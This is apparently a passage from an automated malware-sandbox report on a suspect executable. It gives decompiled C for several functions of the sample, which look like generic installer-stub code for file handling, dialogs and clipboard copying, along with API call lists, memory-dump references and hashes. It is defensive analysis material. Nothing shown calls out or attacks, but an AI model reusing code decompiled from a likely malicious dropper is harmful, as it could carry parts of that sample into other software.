                • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040586F, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E0040586F(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                0x00405873
                0x00405880
                0x00405895
                0x0040589b

                APIs
                • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\RHK098760045678009000.exe,80000000,00000003), ref: 00405873
                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405850, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405850(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                0x00405854
                0x0040585d
                0x00000000
                0x00405866
                0x0040586c

                APIs
                • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405866
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004053C3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004053C3(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                0x004053c9
                0x004053d1
                0x00000000
                0x004053d7
                0x00000000

                APIs
                • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 004053C9
                • GetLastError.KERNEL32 ref: 004053D7
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateDirectoryErrorLast
                • String ID:
                • API String ID: 1375471231-0
                • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403081, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403081(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                0x00403085
                0x00403098
                0x004030a0
                0x00000000
                0x004030a7
                0x00000000
                0x004030a9

                APIs
                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDA,000000FF,00000004,00000000,00000000,00000000), ref: 00403098
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004030B3, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004030B3(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                0x004030c1
                0x004030c7

                APIs
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,0002B3E4), ref: 004030C1
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00404FC2, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E00404FC2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423724; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F56, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420538;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42370c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423f48, 8);
							__eflags =  *0x423fcc - _t149; // 0x0
							if(__eflags == 0) {
								E00404E84( *((intOrPtr*)( *0x41fd08 + 0x34)), _t149);
							}
							E00403E2D(1);
							goto L25;
						}
						 *0x41f900 = 2;
						E00403E2D(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EBB(_a8, _a12, _a16);
						}
						ShowWindow( *0x423710, _t149);
						ShowWindow(_t154, 8);
						E00403E89(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f50; // 0x4e0f60
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423710 = GetDlgItem(_a4, 0x403);
				 *0x423708 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423724 = _t127;
				_v8 = _t127;
				E00403E89( *0x423710);
				 *0x423714 = E00404726(4);
				 *0x42372c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E54(_a4);
				if(( *0x423f58 & 0x00000003) != 0) {
					ShowWindow( *0x423710, _t149);
					if(( *0x423f58 & 0x00000002) != 0) {
						 *0x423710 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E89( *0x423708);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f58 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                0x00404fcb
                0x00404fd1
                0x00404fda
                0x00404fdd
                0x0040516e
                0x00405175
                0x00405199
                0x00405199
                0x0040519f
                0x004051ac
                0x004051ca
                0x004051ca
                0x004051d1
                0x00405228
                0x00405228
                0x0040522c
                0x00000000
                0x00000000
                0x0040522e
                0x00405231
                0x00000000
                0x00000000
                0x0040523b
                0x00405241
                0x00405243
                0x00405246
                0x0040533f
                0x00000000
                0x0040533f
                0x00405255
                0x00405261
                0x00405267
                0x0040526a
                0x0040526d
                0x00405282
                0x00405285
                0x00405285
                0x00405288
                0x0040526f
                0x00405274
                0x0040527a
                0x0040527d
                0x0040527d
                0x00405298
                0x004052a0
                0x004052a1
                0x004052a3
                0x004052ac
                0x004052af
                0x004052b6
                0x004052bd
                0x004052c5
                0x004052c5
                0x004052d3
                0x004052d9
                0x004052dc
                0x004052dc
                0x004052e3
                0x004052e9
                0x004052f2
                0x004052f9
                0x00405302
                0x00405304
                0x00405307
                0x00405316
                0x00405318
                0x0040531e
                0x0040531f
                0x00405320
                0x00405320
                0x00405328
                0x00405333
                0x00405339
                0x00405339
                0x00000000
                0x004052a3
                0x004051d3
                0x004051d9
                0x00405209
                0x0040520b
                0x00405211
                0x0040521c
                0x0040521c
                0x00405223
                0x00000000
                0x00405223
                0x004051dd
                0x004051e7
                0x00000000
                0x004051ae
                0x004051ae
                0x004051b4
                0x004051ec
                0x00000000
                0x004051f5
                0x004051bd
                0x004051c2
                0x004051c5
                0x00000000
                0x004051c5
                0x004051ac
                0x00404fe3
                0x00404fe7
                0x00404ff0
                0x00404ff7
                0x00404ffa
                0x00404ffd
                0x00405000
                0x00405001
                0x00405002
                0x0040501b
                0x0040501e
                0x00405028
                0x00405037
                0x0040503f
                0x00405047
                0x0040504c
                0x0040504f
                0x0040505b
                0x00405064
                0x0040506d
                0x00405090
                0x00405096
                0x004050a7
                0x004050ac
                0x004050ba
                0x004050c8
                0x004050c8
                0x004050cd
                0x004050db
                0x004050db
                0x004050e0
                0x004050e3
                0x004050e8
                0x004050f4
                0x004050fd
                0x0040510a
                0x00405119
                0x0040510c
                0x00405111
                0x00405111
                0x00405125
                0x00405125
                0x00405139
                0x00405142
                0x0040514b
                0x0040515b
                0x00405167
                0x00405167
                0x00000000

                APIs
                • GetDlgItem.USER32 ref: 00405021
                • GetDlgItem.USER32 ref: 00405030
                • GetClientRect.USER32 ref: 0040506D
                • GetSystemMetrics.USER32 ref: 00405075
                • SendMessageA.USER32 ref: 00405096
                • SendMessageA.USER32 ref: 004050A7
                • SendMessageA.USER32 ref: 004050BA
                • SendMessageA.USER32 ref: 004050C8
                • SendMessageA.USER32 ref: 004050DB
                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                • ShowWindow.USER32(?,00000008), ref: 00405111
                • GetDlgItem.USER32 ref: 00405132
                • SendMessageA.USER32 ref: 00405142
                • SendMessageA.USER32 ref: 0040515B
                • SendMessageA.USER32 ref: 00405167
                • GetDlgItem.USER32 ref: 0040503F
                  • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                • GetDlgItem.USER32 ref: 00405184
                • CreateThread.KERNEL32 ref: 00405192
                • CloseHandle.KERNEL32(00000000), ref: 00405199
                • ShowWindow.USER32(00000000), ref: 004051BD
                • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                • ShowWindow.USER32(00000008), ref: 00405209
                • SendMessageA.USER32 ref: 0040523B
                • CreatePopupMenu.USER32 ref: 0040524C
                • AppendMenuA.USER32 ref: 00405261
                • GetWindowRect.USER32 ref: 00405274
                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                • SendMessageA.USER32 ref: 004052D3
                • OpenClipboard.USER32 ref: 004052E3
                • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004052E9
                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                • GlobalLock.KERNEL32 ref: 004052FC
                • SendMessageA.USER32 ref: 00405310
                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                • SetClipboardData.USER32 ref: 00405333
                • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405339
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                • String ID: {
                • API String ID: 590372296-366298937
                • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004047D3, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 98%
                			E004047D3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f68; // 0x4e110c
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423f50; // 0x4e0f60
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423f59 & 0x00000002;
							if(( *0x423f59 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404753(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423f58; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420514;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42052c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420514 = _t315;
									 *0x42052c = _t315;
									 *0x423fa0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423f59 & 0x00000001;
										if(( *0x423f59 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423f6c - _t315; // 0x3
										_v32 =  *0x42052c;
										_t196 =  *0x423f68; // 0x4e110c
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42371c; // 0x4e7cf3
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040470E(0x3ff, 0xfffffffb, E00404726(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x4e1114
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x4e1124
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423f6c; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42052c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
